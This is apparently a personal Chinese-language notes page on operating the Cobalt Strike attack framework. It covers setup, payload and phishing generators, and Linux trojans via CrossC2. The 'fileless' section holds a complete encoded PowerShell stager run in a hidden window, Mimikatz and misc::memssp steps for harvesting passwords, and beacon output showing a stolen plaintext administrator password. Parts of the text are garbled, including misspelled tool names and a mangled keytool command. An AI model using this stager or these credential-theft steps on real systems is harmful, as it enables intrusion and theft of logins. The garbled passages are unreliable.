Cobalt Strike笔记(持续更新)
Cobalt Strike笔记(持续更新)
简介
CoastStrike是一款基于Java的渗透测试工具套装,在网络安全领域享有盛誉被称为'CoastStrike'工具。自版本3.0以来已不再依赖Metasploit框架而是独立运行,并采用客户端与服务端划分模式。服务端只有一个实例而客户端则可以同时运行多个实例特别适合团队协同作战场景。多个攻击者可以同时接入同一台团队服务器进行协作共享攻击资源、目标信息以及会话数据可模拟Advanced Persistent Threat(APT)进行对抗训练并进行内网渗透操作。 CoastStrike集成了以下核心功能:提供端口转发功能实现服务扫描模块支持自动化溢出功能具备多模式端口监听能力能够生成Win EXE木马、Win DLL木马以及Java木马家族成员同时支持多种类型的Office宏病毒生成提供钓鱼攻击能力包括以下几种类型:站点克隆、目标信息获取、Java执行、浏览器自动攻击等
步骤
./teamserver
启动服务端
vim teamserver
配置文件,修改端口
java -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar
启动客户端
1.Cobalt Strike
Perferences:配置Cobal Strike界面、操作台及相应的控制界面、报告格式设置和TeamServer连接日志记录
Visualization:设置显示界面的方式共有三种,在难以描述的情况下,请自行操作以熟悉其功能。
VPN Interfaces:设置vpn接口
LIsteners:设置监听。最重要的功能,里面有很多监听脚本
2.View
Applications - > 获取浏览器版本信息
Credentials - > 在此链接中可获取通过hashdump或Mimikatz工具捕获的密码信息。
Downloads - > 下载文件Event Log -> 主机上线记录以及团队协作聊天记录
Keystrokes - > 键盘记录
Proxy Pivots - > 代理模块
Screenshots - > 进程截图
在Script Console界面中指向控制台并查看所有脚本https://github.com/rsmudge/cortana-scripts
Targets - > 显示目标
Web Log - > Web访问记录
3.Attacks
HTML程序用于生产恶意HTA木马文件;
MS Office 宏用来制造宏病毒文件;
工具生成多种语言版本的payload;
通过自动播放机制生成运行木马的可执行文件;
Windows打包工具专门用于文档类文件的捆绑;
生成无状态可执行文件的Windows独立可执行程序;
提供多种版本选择的服务端可执行程序。
Web Drive-by(钓鱼攻击)
负责管理已开启的Web服务;
生成网站副本以记录受害者提交的数据;
提供一个文件下载窗口,并可修改文件头信息;
类似于MSF中的Web_Delivery组件 ;
通过Java自签名程序执行钓鱼攻击 ;
根据不同Java版本自动检测并发起攻击 ;
用于收集系统相关信息(如系统版本、Flash版本及浏览器版本等);
专门用于通过电子邮件进行钓鱼攻击的工具模块。
4.reporting
activity report 生成活动报告
主机报告 Hosts report
目标指示器 Indicators opromisef com
会话记录 Sessions report
社会工程攻击 Social engineering report
数据导出 Export data
实战操作
对于Beacon来说是一个内部的Listener,在目标主机上运行特定payload以实现将shell连接至CS;其功能涵盖了DNS、HTTP和SMB协议。
Foreign则是一种跨平台整合的Listener,在MSF中被广泛应用于整合meterpreter至MSF环境中。
重新生成证书
修改证书标准
查看证书信息
keytool -list -v -keystore cobaltstrike.store -storepass xingshen
修改默认密码
cobaltstrike.jar文件中的证书创建
keytool(-keystore./ssl.store,-storepass.123456q,-keypass.123456q,-genkey,-keyalg.RSA,-alias.Chrome,-dname."CN%3D051%2C%20OU%3DSSL-RSA%2C%20O%3DChrome%2C%20L%SOMWHERE%2C%20ST%Cyanosphere%2C%20C%Earth")
JDK自带的密钥管理工具通过命令行参数完成密钥的生成与存储操作。具体来说,该命令串将生成一个存储位置位于./proxy.store的安全参数文件,并配置该文件中的密码强度值为123456q;同时设置系统主密码也为123456q并执行相关操作。其中 '-genkey'选项用于生成新密钥 '-keyalg RSA'指定了使用RSA算法进行操作 '-alias Chrome'则指定了该密钥的别名为Chrome '-dname "CN=051..."'则用于配置该密钥的具体名称信息
linux
安装java
yum install java-11-openjdk.i686
CrossC2
进行配置
linux和windows配置路径不同
加载配置文件
此时服务端生成.cobaltstrike.beacon_keys
将CobaltStrike服务端的.cobaltstrike.beacon_keys文件被复制并移动至CobaltStrike客户端目录中。
基于当前版本的Cross C2(Cross C2 v1.0)已实现HTTPS Beacon功能,在Listenrs应用中启用HTTPS协议的监听功能。
生成linux木马
CS4.4:genCrossC2 监听ip 监听端口 cs_key文件 null Linux x64 木马名字 stager 4.4
赋予木马执行权限
执行木马,上线
获取windows密码
无文件上线
powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBMAFYAWABhADIALwBpAFMAaABMADkAbgBQAHcASwBmAHgAZwBKADAASgBBAHMAcwBZAEYATQA3AGwAVwBrAGEAeAA3AG0AYQBTAEMAWQBsADgAbQBOAG8AcQBhADcAZwBRAFkALwAyADIAMAB3ADMASgAzAC8AdgB0AFUARwBNAHAAawA3AG0AZAAyAFIAZABqAGMAUwBjAHIAZgBkAFYAWABYAHEAMQBLAE0AcgBGAGgAVQAzAGwAdQBBAE0AQwA5AE0AbgBWAEwAbQBaAFUAQgA0AHgAMwAxAFAAVQA2ACsAdABsADcARwBFAGgAMQAzAEwAeAB1AHEATABpAE4AZQBBACsAZgBrAFcARQBjAEIAcABGAHkAbAAvAFgAVgB3AFAARQBrAGEAdABrAFAAKwAwAFEAZgAzAFYAOQBFAGoAcwAwAHIANgBRAGIAZQBaAEMAUwBtAE4AUABjADEAZABYADEAVgBmAG8AcQA5AGkASwAwAHAASwA4AGUARQBtAHgASABYADEAMABxADEAagA2AEoAbABFAGMAbAArADYAdwBIAFEAYwAxADMARQBmAE4AZQBmAHYAdQB0AEcAbgBOAE8AUABYAEgAYQAzAHoAYQBvADAASwBPAEkAdQBnAHUASAAwAFMAaQBiAFUALwA2AHAAVABOAGUAVQAwADUAdgArAFkAawBPAHgAVQBQADUAUwBQAHIAMwBlAE4AaAB4AC8AZwBaAHoAegBzAFUATQBWADQAVABWADQAbwBYAHQARQBmAHUAdgA2AEcARQBrAFAAYgBxADMAQQBZAFMASwBiACsAZgBQAFAAVABPADcANQA1AHUANwBsAHQAaAA3AEcAeQBJAG0AeQBHAGUAcwBRAEMAZQByAGUARQBzAGYASgA1AEoAUwB2AE8AVwBsAHcAZABBAGgAbwBOAG0ATQB5AHoAUAAzAEkAWAA0AHIAYgBLAGYATQAwADkAWABhAGMAbwB1ACsAbAA0AE0AMABUADkAawB6AHUANwBOAGsAcQBRAE8ARABIAHoANQAyAFUAVwBrADgAeQAyAFEAdwBzAEIAOABDAE4AZgB1AEkAdwBrADEAZQBlAHAAYgAzAG4AbAB4AGYAbABqAHoAYwAwAHcAOQBnAFQAegBLAFcAMwBMAFUAOQBRADcAZwBjAFcANQBUAHUARwBhAFgAVABiAFIAQgA1AHgANgBKAEEAdQBRAFMAdwBUAFEAYwB5ADgAVgBTAFkASABJAEQAZwBWAE0AZgBlAFUAQwB4AGEAUQAyAC8AbABiAG0AdgAzAGsAeABZADYAVABCADcAMwBQAHYANgByADMASgBkAHUAagArAHcAdQA1AHYAeQBxAFUAZgBTADgARQBwAHcAYQBDADUALwBMAG4AbgBQAGcAVgBPAHMAdwAwAGIAMAA3AHEAdwBKADAAZgAwAEwAOQBMAHIAaAB6ADgALwBaAEIAZwB1AGUAdQB2AEgANgBVAHEAbwBRADUAZABJAFUARgBmAEIAZgBEADcATABsAGUAdgByADYANgBlADAAeQBVAEYAZgA3AEkARABQADIASwBwADMASwBOAFMAeQBDAHMAbQBnAEUARABDADUAdwBjAFoAegBoAEcAUABhAGUANwBsAFcAMwB4AE8AWgBpACsAUwBVAGYANgBuAGkAdQA0AHUAVQBtAGUAWgBVADMAaABPAE8AQgA2AFYANQA0AG4AUAB5AE0AdgAxAFYAZQA3ADYAbgBEADMAeQAvAGUAcwBpAFoAZwA2AGgAWABIADcALwBlAFQAWABVADYASgBKADUAdABIAGIAdwBrAE0AdgB3AEoAZQBHAHoASAA4AFcATQBMAGgAMgBhADgAbgBGADcATwBkAFkARABuAE4AbgBNACsAUQBNAGwAdABUAE0ANwBHAFUAbgBvADgANAA5AGkAZABaAGUASgBOADkAbgBLAEMAWgB5AE8ASQBlADQAUgBvAEkASwBVAHkASAAwAFAANQBoAFQARABiAEsAYgBsAG0AZABRAEYALwBrADUANwBTAE4ATgBQAFMAeQBnAHoAZQBqAGwAOQBMAHEAMwBEAHgAYgByAGMAeQAxAHkAdQBPAGkAaQBLADgAcwBvAGcAaABqAHIASABlAGMAVwBpAHkASwBFAGsAcgArAGgAZQB4AE0ANgBmADkARgBqADQANgBUAEwAegBEAGEANABaAE8ANABKAGgARgBJAG0ATAB1AHAAZgBjAEIANQBTAGUAVABWAGQAOQBEAHkAbwBtAHgAaABCAGQAbwBHAEYAawBCAFIAUQB6ADUARQBoAFcAOABrAHEAVABFAFYAbwA1AFcARwB4ADEAZwBaAEQANQBrAEoATQBxAGMAaAB3AG8ATwBkAEMAMABnADUAagBBAEcAOABtAEYASgBXAFQATwBjAEoATAAvAGUAMwA3AGsAYgBpADAAcQBXAG0ANwBnAFUAQgBkAE8AcAAxADMASQBjAE4AQQBLAGUAcwA2ADUAbwB0AEoAMABRAHkAdABLAE0AdgA4AEcAOQBxAFYATwBUAGsAVQBoAHUAYgBxAFEAOQBBADQAMABKAEkARABsACsAQwBLAHYAVABCAGcAWAAwAE4AYwB5ACsAUgA4AFMANwA3ACsARAA5ADMAMgBMACsAUQA1AG0AbABkAE4AegBJAEwATgBwAEkAYgBhAFcAMABOAEIAUABYAFEARABZAGkAZABnAFIAbQBqAEUATgBsAFMAOAA1AFcAWQBMAFAAbABZAE8AUQB0AFoAUwBxAHcAZgBLADYAZQBYAHcAagBPAHEAVwBWAEMAeABBAHkAdQBPADkAVwBVAEUAVABMAFIAUwB2AHQAYwBkAG0ATQBwAHMAYQByADUARwBIAFEATABSAC8ATQBUAFUAdAB0AEgAMgB5AHYAbAAyAEIAdgB3AHUAcwA3AG8ANABIAEsANgArAFIASgBqAFgAMAA4AEUAagB4AHMAMQBtAHUAdwBIADIASQAxAGkAcAB5AEcARQB5AHoAVwAzAFIAQQBsADMAYwAwAG0AZQBhAGoATwBEAHYAVwBCAHIAbgBaAFoAbQBaAFYAWQBLACsANQBXAGoAcAA3AEIAcwBBAHQAeQBUADMAMwBmAEgAagA3AHcAMQBxADUAbgArAEUANQAwADMANgBrAGEAMAB6AEYAaQBtAHoAQwAxAEYAYgB2AEYATwAxAEoASABoACsANABSAGwAOQBlADgAcgAxAEwAZgAzAHYAZgBDADEAbQA2AGcAawArAGsATwBsADkAMgBPAGIANQBRAEYAeQBFADcAaQBlAGgAegB3AGUAdAB3AGYAMgBIAEUAMwA3AEwAbwB0AFYAbAB6AHYAYQBoAFAAUgAzAHIAVQBhAFgANQBvAGQAMQBVAFoAZgBuAE0AVQA5AFQAZQBWAEoASwBHADMAWgA0AFcAcQBIADUAUAA3ADQASQBQAGMAcwByAEYASQB1ADcAZABqAEEAUAB0AFgAdQB5AG4AVABhAHYAcgBlADkAZwBOAEYAcAB2AEQAcgB1AGUAdwB5AFQAWQA0ADIAcQBiAFgAZwBmACsAeQBZAE8ASQBxADEAMwB4AE0AdgB0AGQAbwBPAEMAdQA3AEcAMQB2AGUAdQBNAHgAdgBNAFoAYwBIAE8ASABRAG0ANABzAHkAdAB5AHkAQQAyAGMAMwAwAGMAZABiAGIAVABEAG4ASwBiAGEAZABBAFIAaAA3AEUAaQBmAEQAYQB2AHQAbwBCADkAcwA1AG0AWQBSADEAYgBiAEQAbwBSAEYAWAB3AFYAWABOADQARwBMAGUAWgBXADEAcQB4ADEAdQBGADgAegBtADAAZgBMAEsAcwBDAHoAOAA2AGMAZABNAEkAdgBKAFgASgBVAEQAMABaAFEAUgBHAFgATwBnAE4AYwBFAGIATgAxAEwAagB2AEUANAAyAHQAUgBwADMAOABNAHoAZwA3AGwANAByAGQAYQBHAEcALwB6AGcAeABtAEUASgBzAEIAZQBiAHYAWABaAG4AbAB2AEIAUQBkAE8AWQBEAGEAYQBlAHcAMwBWAGgAbAA4AHcAbABzAGgARwBIAFUAWQA5AEEAOQBOAHIAQgBtADcAbQBUAHUANwBOAEEAcwBsAFMAdgBBADcALwBPAFUAYgA0AHMAUABSADYAegAxAEUAbwBrAGwAdwBkAFAATwB2AE0AYgBHADkAOQBQAGUAVQBRADEAaQBNAHcAcAA0AFUAZQBMAGsAVwBuADgAZgBCAGUAVQB2AHMAQgA2ADAAdABpAFoAdgB0AHAAaQA1AE8AWgBTAGIASQBMAGMAMwBVAFkARQAwAEYAOAB5AGMATAB2AFQAMgBzAGUASQBDAGgAOQBwAHEAdAB0AFIANgBKAFoAcgBZAHMANgByAFcAZQA2AGkAdQBoAHkAdABiADkAOABlAHoARgBYAEcAUgBDADMANAArAGwAZgBaAEUAYgBZAHUANQAyAGsANwBtACsAeABKAGIAegBFAGgASQBwAGsARgBDAFAATAAxAFAAMQBQAG0AZQA3AEUAcwBPAGMAaAA5AGMAZgBVAFYANAB0AFIARwAxAFcAOABrADgAMABqADIAegAwAGQATABtAFQAMABPAG4AMwByAGUAMwB3ADgAWgBvAGcAdQBlADYAVwBqAEsAbgA0ADIAQQB3AEsAcgBSAE0AWQAxADgAWQA2AFgAdQBoAGoAKwBxAGwAMABaAE4ARABPAGsALwBqAGgAMABaAEQANwA4AFcANABFAGIAaAA2AEUAdgBYAHEAeQBhAHAARwA2AGsARgB2AFcARQBqAEcAWQA3ADAAbgB5AE4ANgBjADEAbwBZAHQAVwA5AGYASQAwAE4AbwBTAHEAUwAvAFYAQQBUAEwAaABhAEQAdwB4AGMAYQBFADkAcwAvAGEARgBZAFoAVQBWAGcANAB0ADkARwArAEoASgBLACsAUQBmAFcASABQAHUAagBUAFgAdQBZAHEAMwBRAE0AUgBxAFYARgBmAGgASABLACsAbwA4AHQAQgB2AHQAcABPAFoAVgBOAE4AdQA5ADgAMgB6AFAAOABHAHAAdQBXAHgAQQAxAHUARQBPAGUAbwBXAEsAOQBwAE0AMwBoAFcAOAAyAGQAaABBAHYAVgByAGwAYgBVAHEASQBYADIAMgA0ADMAaAA3AHEAdAA0AFAAOQA5AEEAcgBSAFUATgA3AGUARgBJAFoAOQBIAFUAMgBJAHYAagA4AHMAawBmADIAdwAyADkAWQB4AGoARgA1AHQAdwBOAFYAcgBaAFgANwArAE0AbQBZAFkAcwBwAFkAWABpAEsAKwAyAEIARABRADkANABrAHgATABQADUAdgB1AFkAUgBGAHoAZAB4AGYAegA0AE4AZAB2AE4AVgBxADQAbgAyAGEAMQA2ADEALwB2AC8AeABTAFAAbQBvADkAcABoAEgAKwB0AFAAVgBUAE8AWgBVAFoASgBXAEQATABkAFMAegB1AGIARwBEAGEARwBNAGUANQBEAE8AQQB2AEoATgBQADUAMwA2AHQAMQBSAHEAeQBUAHEASgBtAFoAUQArADUAWABZAGUAZgBCAGIAKwBTAFAASwB2AEQARwBjAGgAegBCAFAAVwBTAEMATQBRAHIAOABwAHoAZgB4ADcAVQBnADcAcwAyAGMAOABkAFIAdgBOAHkASgBXADcAQwB3ADIAawA5ADMAdwBuAG0AcQBDAHQAeQBIAC8ASQBDACsAUABSAFYATgBnAFQAUgB4AHgAZgBkADIAYQBRAFQAdwB0ADQANgBrAHcATQBWAFkARgBxAHoANQA4AFMAdQAyADIAOQBvACsAUABhAFcAdABkACsAaAB5AG0AcABVAFIATwBJAEwAOAByADgATAB4AHgAaABQAEwAVwBJAEsARQB0AFEAagB1AFcANwB6ADkALwBUAGwAdgBvADEAZAB1AG4ANQAwAC8ASgB5ADIAWABzAGYATgB2AGYATABCAEoAUQBwADUAVwB1AHIANwA1AGUANQBvAHMAZABlAHQAZABsAGYAegBiAE4AbQBZAGgASABhACsAUgBBADkANABXAEoANwBIAEsAZgBHAGoANAAzAHoAbgBQAFYAdwBHAGQAUwBJAHAAdgA5ACsARgArAEIATABlAFUAZQBkAFcAQgBNAGgAawBIADYAYwBnAHYAcABqAHUATgBqAE8AUQBuACsAWgBDAFQANwA0ACsAMgBlAGcATgB0ADIARABFAHQATgAvAFgAQwBWACsAMwBhAGgANQBIAEsAWABxADMASQBSAEwANQBmAHAAdQBIAFIAMgA4AFQASQAxAGYAcgB0ADYANQB1AEIAZgAvAGgAMgBSAFgAZQBxAHQAeABEAHEAdgBGAEIASwB0AFUAQwBqAEkAWgA3AEUAQQAyAG4ANgBkAG0ASwBvAGYASABMAEoAdgArAHYASgB5AFgAbgB3AEgANQBiADAAcABKAHoAWAAxAE4AdQBEAHgAMgBIAFAAcAAvAHoAQQBHADMAMQBuADkAegArAHgASwAvAHQASwBaADgAeAB0ADcASwBhAEsAUABLAFoATwBYACsATAA4AEEAaAByAEoAWABuAGgATQBPAEEAQQBBAD0AIgApACkAOwBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAkAHMALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA=
代码解读有文件
PowerShell.exe -ep bypass -w hidden -nop -File C:\Users\nsfocus\Desktop\payload.ps1
代码解读Beacon中的Mimikatz
想获取当前用户的密码信息可以通过执行mimikatt工具完成;双击鼠标右键管理员权限会话选择Access选项,并在其下拉菜单中选择Run Mimikatt;或者通过控制台输入logonpasswords命令。
在View --> Credentials下可以查看到hashdump与mimikatz获取的数据。
以上列举的仅限于 mimikatz 能完成的任务范畴,请查阅 misc::memssp 的使用情况
mimikatz !misc::memssp
cd C:\Windows\system32
shell dir mimilsa.log
shell type mimilsa.log
代码解读详细运行过程:
接下来来到C:\Windows\system32目录
beacon> cd C:\Windows\system32
[*] cd C:\Windows\system32
[+] host called home, sent: 27 bytes
beacon> shell dir mimilsa.log
[*] Tasked beacon to run: dir mimilsa.log
[+] host called home, sent: 46 bytes
[+] received output:
驱动器 C 中的卷没有标签。卷的序列号是 BE29-9C84
C:\Windows\system32 的目录
2020/07/23 21:47 24 mimilsa.log
1 个文件 24 字节
0 个目录 17,394,728,960 可用字节
代码解读
beacon> shell type mimilsa.log
[*] Tasked beacon to run: type mimilsa.log
[+] host called home, sent: 47 bytes
[+] received output:
[00000000:000003e5] \
[00000000:002b99a7] WIN-75F8PRJM4TP\Administrator Password123!
代码解读提权
windows大多使用烂土豆提权
成功弹出system权限
